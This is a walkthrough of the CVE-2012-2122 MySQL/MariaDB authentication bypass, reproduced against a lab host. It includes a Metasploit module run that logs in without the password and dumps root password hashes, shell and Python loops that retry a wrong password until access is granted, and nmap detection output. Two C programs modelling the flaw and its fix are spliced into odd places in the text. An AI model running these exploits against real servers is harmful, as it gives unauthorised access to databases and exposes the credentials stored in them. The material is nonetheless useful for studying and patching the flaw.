CVE-2012-2122: MySQL authentication bypass vulnerability and exploitation

    I. Vulnerability overview

    When a client connects to MariaDB/MySQL, the password it supplies is compared with the expected correct password. Because the result of that comparison is handled incorrectly, MySQL can treat the two passwords as identical even when memcmp() returns a non-zero value. According to the advisory, roughly one attempt in 256 is accepted by chance.
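    The root cause behind that comparison failure, as a constructed C illustration added here (not MySQL's own code): check_scramble() returned memcmp()'s int result through my_bool, a plain char, so a non-zero result such as 256 narrows to 0 and reads as "match". The two stand-in comparators, the 16-bit sweep and the sample hashes below are assumptions for demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed illustration of the CVE-2012-2122 root cause; not MySQL's source.
   MySQL compared the SHA1 hash derived from the client's reply with the stored
   hash using memcmp() and returned that int through my_bool (a char).  memcmp()
   only promises "zero if equal, non-zero otherwise"; optimised libc builds can
   return values such as 256 or -512, which truncate to 0 in a char. */

typedef char my_bool;               /* MySQL's historical boolean type */
#define SHA1_HASH_SIZE 20

typedef int (*cmp_fn)(const uint8_t *, const uint8_t *, size_t);

/* Stand-in for a byte-at-a-time memcmp(): results always lie in -255..255,
   so narrowing to char never reaches 0 for a mismatch (bug invisible). */
int cmp_bytewise(const uint8_t *a, const uint8_t *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (a[i] != b[i]) return (int)a[i] - (int)b[i];
    return 0;
}

/* Stand-in for an optimised memcmp() whose non-zero result leaves the char
   range.  Constructed: every mismatch is scaled by 256 so the effect shows
   on each call; a real implementation only does so for some inputs, which
   is where the roughly 1-in-256 acceptance rate comes from. */
int cmp_wide(const uint8_t *a, const uint8_t *b, size_t n)
{
    return cmp_bytewise(a, b, n) * 256;
}

/* Vulnerable shape: the int result is narrowed to my_bool on return.  The
   original relied on the implicit conversion; the cast is written out here
   so the narrowing is visible.  0 means "hashes match". */
my_bool check_scramble_vuln(const uint8_t *stored, const uint8_t *derived, cmp_fn cmp)
{
    return (my_bool) cmp(stored, derived, SHA1_HASH_SIZE);
}

/* Fixed shape (MySQL 5.5.24 / MariaDB 5.5.23): reduce to 0/1 before the
   narrowing conversion, so any non-zero difference stays non-zero. */
my_bool check_scramble_fixed(const uint8_t *stored, const uint8_t *derived, cmp_fn cmp)
{
    return (my_bool) (cmp(stored, derived, SHA1_HASH_SIZE) != 0);
}

/* Authentication decision as the caller saw it: 1 = accepted, 0 = rejected. */
int login_accepted(my_bool (*check)(const uint8_t *, const uint8_t *, cmp_fn),
                   const uint8_t *stored, const uint8_t *derived, cmp_fn cmp)
{
    return check(stored, derived, cmp) == 0;
}

/* How many non-zero memcmp() results in [lo, hi] does each version wrongly
   accept?  Over the full 16-bit range the vulnerable narrowing lets 255 of
   65535 through (every non-zero multiple of 256), the fixed one none. */
int count_false_accepts(int lo, int hi, int fixed)
{
    int count = 0;
    for (int r = lo; r <= hi; r++) {
        if (r == 0) continue;                       /* genuine match */
        my_bool verdict = fixed ? (my_bool) (r != 0) : (my_bool) r;
        if (verdict == 0) count++;
    }
    return count;
}

int main(void)
{
    uint8_t stored[SHA1_HASH_SIZE]  = {0};          /* constructed stored hash */
    uint8_t derived[SHA1_HASH_SIZE] = {0};
    derived[3] = 7;                                 /* wrong password: one byte differs */
    printf("bytewise memcmp, vulnerable check: accepted=%d\n",
           login_accepted(check_scramble_vuln, stored, derived, cmp_bytewise));
    printf("wide memcmp,     vulnerable check: accepted=%d\n",
           login_accepted(check_scramble_vuln, stored, derived, cmp_wide));
    printf("wide memcmp,     fixed check:      accepted=%d\n",
           login_accepted(check_scramble_fixed, stored, derived, cmp_wide));
    printf("non-zero results in [-32768,32767] accepted: vuln=%d fixed=%d\n",
           count_false_accepts(-32768, 32767, 0), count_false_accepts(-32768, 32767, 1));
    return 0;
}
```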

    Affected products:

    All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
    MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
    MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

    II. Impact

    Knowing only a valid username, an attacker can log straight into the SQL database simply by retrying the connection enough times.

    III. Verification

     1. Metasploit

    msf > use  auxiliary/scanner/mysql/mysql_authbypass_hashdump 
    msf auxiliary(mysql_authbypass_hashdump) > info 
    
           Name: MySQL Authentication Bypass Password Dump
         Module: auxiliary/scanner/mysql/mysql_authbypass_hashdump
        License: Metasploit Framework License (BSD)
           Rank: Normal
      Disclosed: 2012-06-09
    
    Provided by:
      theLightCosine <theLightCosine@metasploit.com>
      jcran <jcran@metasploit.com>
    
    Basic options:
      Name      Current Setting  Required  Description
      ----      ---------------  --------  -----------
      RHOSTS                     yes       The target address range or CIDR identifier
      RPORT     3306             yes       The target port (TCP)
      THREADS   1                yes       The number of concurrent threads
      USERNAME  root             yes       The username to authenticate as
    
    Description:
      This module exploits a password bypass vulnerability in MySQL in 
      order to extract the usernames and encrypted password hashes from a 
      MySQL server. These hashes are stored as loot for later cracking.
    
    References:
      https://cvedetails.com/cve/CVE-2012-2122/
      OSVDB (82804)
      https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
    
    msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 192.168.118.130
    RHOSTS => 192.168.118.130
    msf auxiliary(mysql_authbypass_hashdump) > run 
    
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 The server allows logins, proceeding with bypass test
    [*] 192.168.118.130:3306  - 192.168.118.130:3306 Authentication bypass is 10% complete
    [*] 192.168.118.130:3306  - 192.168.118.130:3306 Authentication bypass is 20% complete
    [*] 192.168.118.130:3306  - 192.168.118.130:3306 Successfully bypassed authentication after 207 attempts. URI: mysql://root:iTk@192.168.118.130:3306
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    [*] 192.168.118.130:3306  - 192.168.118.130:3306 Hash Table has been saved: /root/.msf4/loot/20180829155507_default_192.168.118.130_mysql.hashes_835663.txt
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf auxiliary(mysql_authbypass_hashdump) > 
    

     2. Linux shell

    root@kali:~# for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.118.130  ; done
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    [... the same error line repeats for the remaining failed attempts ...]
    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MySQL connection id is 1513
    Server version: 5.5.23 Source distribution
    
    Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
    
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    
    MySQL [(none)]> 
    MySQL [(none)]> select version();
    +-----------+
    | version() |
    +-----------+
    | 5.5.23    |
    +-----------+
    1 row in set (0.00 sec)
    
    MySQL [(none)]> 
    

     3. Python

    The script simply calls subprocess.Popen to run the shell command in a loop:

    #!/usr/bin/python
    import subprocess
    
    # Re-run the mysql client with a deliberately wrong password; wait() lets
    # each attempt finish before the next one starts.
    while True:
        subprocess.Popen("mysql -h 192.168.118.130 -u root mysql --password=blah", shell=True).wait()
    

    The run in practice:

    root@kali:~# python test.py 
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    [... identical error lines repeat; the captured output on the original page ends here ...]
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A
    
    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MySQL connection id is 2697
    Server version: 5.5.23 Source distribution
    
    Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
    
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    
    MySQL [mysql]> 
    

     4、nmap script(mysql-vuln-cve2012-2122):

    root@kali:~# nmap -sV -T4 -p3306  --script=mysql-vuln-cve2012-2122 192.168.118.130
    
    Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:07 CST
    Nmap scan report for bogon (192.168.118.130)
    Host is up (0.00033s latency).
    PORT     STATE SERVICE VERSION
    3306/tcp open  mysql   MySQL 5.5.23
    | mysql-vuln-cve2012-2122: 
    |   VULNERABLE:
    |   Authentication bypass in MySQL servers.
    |     State: VULNERABLE (Exploitable)
    |     IDs:  CVE:CVE-2012-2122
    |       When a user connects to MariaDB/MySQL, a token (SHA
    |       over a password and a random scramble string) is calculated and compared
    |       with the expected value. Because of incorrect casting, it might've
    |       happened that the token and the expected value were considered equal,
    |       even if the memcmp() returned a non-zero value. In this case
    |       MySQL/MariaDB would think that the password is correct, even while it is
    |       not.  Because the protocol uses random strings, the probability of
    |       hitting this bug is about 1/256.
    |       Which means, if one knows a user name to connect (and "root" almost
    |       always exists), she can connect using *any* password by repeating
    |       connection attempts. ~300 attempts takes only a fraction of second, so
    |       basically account password protection is as good as nonexistent.
    |       
    |     Disclosure date: 2012-06-9
    |     Extra information:
    |       Server granted access at iteration #1500
    |   
    |     root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    |   
    |     References:
    |       http://seclists.org/oss-sec/2012/q2/493
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
    |_      https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
    MAC Address: 00:0C:29:25:90:3B (VMware)
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds
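
    The root cause the script output above describes, as an added C example (it is neither MySQL's source nor code from the original post): check_scramble() returned memcmp()'s int through a char-sized my_bool, so any non-zero difference that is a multiple of 256 was truncated to 0 and read as "password correct". word_memcmp() below is a constructed stand-in for an optimised libc memcmp that returns word differences instead of byte differences (the real trigger was the SSE-optimised glibc memcmp on some 64-bit builds), the LCG is a stand-in for the per-connection scramble, and the expected-token bytes are made up; only the shape of the vulnerable and fixed return statements follows the actual fix.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SHA1_HASH_SIZE 20
typedef char my_bool;   /* MySQL's my_bool is a plain char on the affected builds */

/* Constructed stand-in for an optimised memcmp(): it compares 4-byte words and
 * returns their arithmetic difference, so the result is not confined to
 * -255..255.  This simulates the libc behaviour that triggered the bug; it is
 * not glibc's code. */
static int word_memcmp(const void *a, const void *b, size_t n)
{
    const uint8_t *x = a, *y = b;
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        uint32_t wx = (uint32_t)x[i] | ((uint32_t)x[i + 1] << 8) |
                      ((uint32_t)x[i + 2] << 16) | ((uint32_t)x[i + 3] << 24);
        uint32_t wy = (uint32_t)y[i] | ((uint32_t)y[i + 1] << 8) |
                      ((uint32_t)y[i + 2] << 16) | ((uint32_t)y[i + 3] << 24);
        if (wx != wy)
            return (int)(wx - wy);   /* wraps modulo 2^32, as gcc/clang do */
    }
    for (; i < n; i++)
        if (x[i] != y[i])
            return (int)x[i] - (int)y[i];
    return 0;
}

/* Vulnerable shape (before MySQL 5.5.24 / MariaDB 5.5.23): memcmp()'s int is
 * returned through my_bool (char), so a non-zero result that is a multiple of
 * 256 is truncated to 0, which the caller reads as "password correct". */
my_bool check_scramble_vulnerable(const uint8_t *expected, const uint8_t *computed)
{
    return word_memcmp(expected, computed, SHA1_HASH_SIZE);
}

/* Fixed shape: test the int result against zero before it is narrowed. */
my_bool check_scramble_fixed(const uint8_t *expected, const uint8_t *computed)
{
    return word_memcmp(expected, computed, SHA1_HASH_SIZE) != 0;
}

/* Sweep every non-matching value of the first two token bytes (65535 cases)
 * and count how many a checker wrongly accepts (return value 0 == match). */
int count_false_accepts(my_bool (*check)(const uint8_t *, const uint8_t *))
{
    uint8_t expected[SHA1_HASH_SIZE] = {0}, computed[SHA1_HASH_SIZE] = {0};
    int accepted = 0;
    for (int v = 1; v < 65536; v++) {
        computed[0] = (uint8_t)(v & 0xff);
        computed[1] = (uint8_t)(v >> 8);
        if (check(expected, computed) == 0)
            accepted++;
    }
    return accepted;
}

/* Sanity check: the genuine token must still be accepted by both versions. */
int correct_token_accepted(my_bool (*check)(const uint8_t *, const uint8_t *))
{
    uint8_t t[SHA1_HASH_SIZE];
    for (int i = 0; i < SHA1_HASH_SIZE; i++)
        t[i] = (uint8_t)(i * 37);       /* made-up token bytes */
    return check(t, t) == 0;
}

/* Constructed attack loop: tokens come from a small LCG (stand-in for the
 * per-connection random scramble, not MySQL's RNG).  Returns the attempt at
 * which the checker first accepts a wrong token, or -1 if it never does. */
int attempts_until_accept(my_bool (*check)(const uint8_t *, const uint8_t *),
                          uint32_t seed, int max_tries)
{
    const uint8_t expected[SHA1_HASH_SIZE] = {   /* made-up stored token */
        0x6b, 0xb4, 0x83, 0x7e, 0xb7, 0x43, 0x29, 0x10, 0x5e, 0xe4,
        0x56, 0x8d, 0xda, 0x7d, 0xc6, 0x7e, 0xd2, 0xca, 0x2a, 0xd9};
    uint8_t computed[SHA1_HASH_SIZE];
    uint32_t s = seed;
    for (int attempt = 1; attempt <= max_tries; attempt++) {
        for (int i = 0; i < SHA1_HASH_SIZE; i += 4) {
            s = s * 1664525u + 1013904223u;   /* full-period LCG mod 2^32 */
            computed[i]     = (uint8_t)s;
            computed[i + 1] = (uint8_t)(s >> 8);
            computed[i + 2] = (uint8_t)(s >> 16);
            computed[i + 3] = (uint8_t)(s >> 24);
        }
        if (check(expected, computed) == 0)
            return attempt;
    }
    return -1;
}

int main(void)
{
    printf("wrong two-byte prefixes accepted: vulnerable %d/65535, fixed %d/65535\n",
           count_false_accepts(check_scramble_vulnerable),
           count_false_accepts(check_scramble_fixed));
    printf("attempts until a wrong token is accepted: vulnerable %d, fixed %d\n",
           attempts_until_accept(check_scramble_vulnerable, 1u, 1000),
           attempts_until_accept(check_scramble_fixed, 1u, 1000));
    return 0;
}
```

    Build with `cc -o scramble scramble.c && ./scramble`. The vulnerable checker accepts 255 of the 65535 wrong prefixes (one in 256, the rate quoted in the script output) and lets a pseudo-random wrong token through within 256 attempts, because the LCG's low byte cycles through all 256 values; the fixed checker rejects every wrong token and still accepts the genuine one.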
    

    Add the -d option to show nmap's debug output; the detailed trace of the script's connection attempts looks like this:

    root@kali:~# nmap -sV -T4 -p3306  -d  --script=mysql-vuln-cve2012-2122 192.168.118.130
    
    Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:13 CST
    --------------- Timing report ---------------
      hostgroups: min 1, max 100000
      rtt-timeouts: init 500, min 100, max 1250
      max-scan-delay: TCP 10, UDP 1000, SCTP 10
      parallelism: min 0, max 0
      max-retries: 6, host-timeout: 0
      min-rate: 0, max-rate: 0
    ---------------------------------------------
    NSE: Using Lua 5.3.
    NSE: Arguments from CLI: 
    NSE: Loaded 41 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 2) scan.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    NSE: Starting runlevel 2 (of 2) scan.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Initiating ARP Ping Scan at 16:13
    Scanning 192.168.118.130 [1 port]
    Packet capture filter (device eth0): arp and arp[18:4] = 0x000C29A8 and arp[22:2] = 0x84F5
    Completed ARP Ping Scan at 16:13, 0.03s elapsed (1 total hosts)
    Overall sending rates: 29.01 packets / s, 1218.42 bytes / s.
    mass_rdns: Using DNS server 192.168.118.2
    Initiating Parallel DNS resolution of 1 host. at 16:13
    mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
    Completed Parallel DNS resolution of 1 host. at 16:13, 0.00s elapsed
    DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
    Initiating SYN Stealth Scan at 16:13
    Scanning bogon (192.168.118.130) [1 port]
    Packet capture filter (device eth0): dst host 192.168.118.128 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.118.130)))
    Discovered open port 3306/tcp on 192.168.118.130
    Completed SYN Stealth Scan at 16:13, 0.04s elapsed (1 total ports)
    Overall sending rates: 23.44 packets / s, 1031.36 bytes / s.
    Initiating Service scan at 16:13
    Scanning 1 service on bogon (192.168.118.130)
    Completed Service scan at 16:13, 0.00s elapsed (1 service on 1 host)
    NSE: Script scanning 192.168.118.130.
    NSE: Starting runlevel 1 (of 2) scan.
    Initiating NSE at 16:13
    NSE: Starting mysql-vuln-cve2012-2122 against 192.168.118.130:3306.
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #1
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #2
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #3
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #4
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #5
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #6
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #7
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #8
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #9
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #10
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #11
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #12
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #13
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #14
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #15
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #16
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #17
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #18
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #19
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #20
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #21
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #22
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #23
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #24
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #25
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #26
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #27
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #28
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #29
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #30
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #31
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #32
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #33
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #34
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #35
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #36
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #37
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #38
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #39
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #40
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #41
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #42
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #43
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #44
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #45
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #46
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #47
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #48
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #49
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #50
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #51
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #52
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #53
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #54
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #55
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #56
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #57
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #58
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #59
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #60
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #61
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #62
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #63
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #64
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #65
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #66
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #67
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #68
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #69
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #70
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #71
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #72
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #73
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #74
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #75
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #76
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #77
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #78
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #79
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #80
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #81
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #82
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #83
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #84
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #85
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #86
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #87
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #88
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #89
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #90
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #91
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #92
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #93
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #94
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #95
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #96
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #97
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #98
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #99
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #100
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #101
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #102
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #103
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #104
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #105
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #106
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #107
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #108
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #109
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #110
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #111
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #112
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #113
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #114
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #115
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #116
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #117
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #118
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #119
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #120
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #121
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #122
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #123
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #124
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #125
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #126
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #127
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #128
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #129
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #130
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #131
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #132
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #133
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #134
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #135
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #136
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #137
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #138
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #139
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #140
